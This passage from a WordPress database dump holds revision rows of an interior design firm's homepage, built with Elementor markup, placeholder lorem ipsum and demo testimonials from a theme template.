10:22:05','',0,'https://bauhaus.futuremediatrix.com/2023/05/25/4762/',6,'nav_menu_item','',0),(4764,2,'2023-05-25 10:30:59','2023-05-25 10:30:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:30:59','2023-05-25 10:30:59','',22,'https://bauhaus.futuremediatrix.com/?p=4764',0,'revision','',0),(4765,2,'2023-05-25 10:30:59','2023-05-25 10:30:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n		<p>Trust the experts for all your <strong style=\"color: #242424;\">architects &amp; interior needs.</strong></p>		\n			<a href=\"https://demo.ovatheme.com/retirio/services/\" role=\"button\">\n						More Service\n					</a>\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 10:30:59','2023-05-25 10:30:59','',22,'https://bauhaus.futuremediatrix.com/?p=4765',0,'revision','',0),(4766,2,'2023-05-25 10:30:59','2023-05-25 10:30:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n	        				<h4>\n					Home Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/home-design/\"  title=\"Home Design\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n	        				<h4>\n					Commercial Design				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial-design/\"  title=\"Commercial Design\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture 